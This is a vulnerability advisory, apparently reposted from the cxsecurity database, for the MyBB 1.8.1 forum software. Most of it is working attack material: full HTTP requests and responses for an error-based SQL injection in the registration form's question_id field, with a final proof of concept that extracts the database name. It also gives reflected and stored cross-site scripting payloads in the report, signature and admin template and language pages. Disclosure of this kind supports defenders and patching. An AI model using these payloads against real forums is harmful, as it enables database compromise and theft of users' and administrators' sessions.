MyBB 1.8.1 Cross Site Scripting / SQL Injection

2014-11-14 / 2015-04-19
Credit: Smash_
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2014-9240 | CVE-2014-9241
CWE: CWE-89
CWE-79

#Title: MyBB 1.8.X - Multiple Vulnerabilities #Date: 13.11.2014 #Tested on: Linux / Apache 2.2 / PHP 5 (localhost) #Vendor: mybb.com #Version: => 1.8.1 - Latest ATM #Contact: smash@devilteam.pl #Author: Smash_ Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on. Sanitize your inputs ;) 1. SQL Injection Vuln: POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1# #1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#): POST /mybb-1.8.1/member.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 408 regcheck1=?check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2?time=1415880544&step=registration&action=do_register #1 - Response: HTTP/1.1 503 Service Temporarily Unavailable Date: Thu, 13 Nov 2014 15:16:02 GMT <div id="content"> <h2>MyBB SQL Error</h2> <div id="error"> <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl> <dt>SQL Error:</dt> <dd>1054 - Unknown column '9' in 'order clause'</dd> <dt>Query:</dt> SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#' </dd> #2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#): POST /mybb-1.8.1/member.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 409 regcheck1=?check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2?time=1415880544&step=registration&action=do_register #2 - Response: HTTP/1.1 200 OK Date: Thu, 13 Nov 2014 15:21:15 GMT (...) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register --> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Forums - Registration</title> #3 - Request (Final POC): POST /mybb-1.8.1/member.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 475 regcheck1=?check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2?time=1415880544&step=registration&action=do_register #3 - Response: HTTP/1.1 503 Service Temporarily Unavailable Date: Thu, 13 Nov 2014 15:24:34 GMT (...) <div id="content"> <h2>MyBB SQL Error</h2> <div id="error"> <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl> <dt>SQL Error:</dt> <dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd> <dt>Query:</dt> <dd> SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#' </dd> </dl> (...) 2. Cross Site Scripting a) Reflected XSS - Report post Vuln: GET 'type' - XSS"><script>alert(666)</script> localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 Request: GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1 Host: localhost Response: HTTP/1.1 200 OK Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly Content-Length: 1247 Content-Type: text/html <div class="modal"> <div style="overflow-y: auto; max-height: 400px;" class="modal_0"> <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);"> <input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" /> <input type="hidden" name="action" value="do_report" /> <input type="hidden" name="type" value="XSS"><script>alert(666)</script>" /> <input type="hidden" name="pid" value="0" /> b) Stored XSS - Signature Vuln: POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video] #1 - Request (change signature): POST /mybb-1.8.1/usercp.php HTTP/1.1 Host: localhost Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig Content-Type: application/x-www-form-urlencoded Content-Length: 203 my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature #2 - Request (user's profile): GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1 Host: localhost Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig #2 - Response: HTTP/1.1 200 OK Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly Content-Length: 12740 Content-Type: text/html; charset=UTF-8 (...) <table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed"> <tr> <td class="thead"><strong>user's Signature</strong></td> </tr> <tr> <td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td> </tr> </table> <br /> c) Reflected XSS - Templates (AP) Vuln: GET 'title' - title"><script>alert(666)</script> localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1 Request: GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1 Host: localhost Response: HTTP/1.1 200 OK (...) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/1"> <title>Editing Template: calendar"><script>alert(666)</script></title> d) Reflected XSS - Languages (AP) Vuln: GET 'file' - <a onmouseover=alert(666)>woot localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot Request: GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1 Host: localhost Response: HTTP/1.1 200 OK (...) <a href="index.php?module=config-languages">Languages</a> ? <a href="index.php?module=config-languages&action=edit&lang=english">English (American)</a> ? <span class="active"><a onmouseover=alert(666)>woot</span> (...) <div class="title"><a onmouseover=alert(666)>woot</div>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top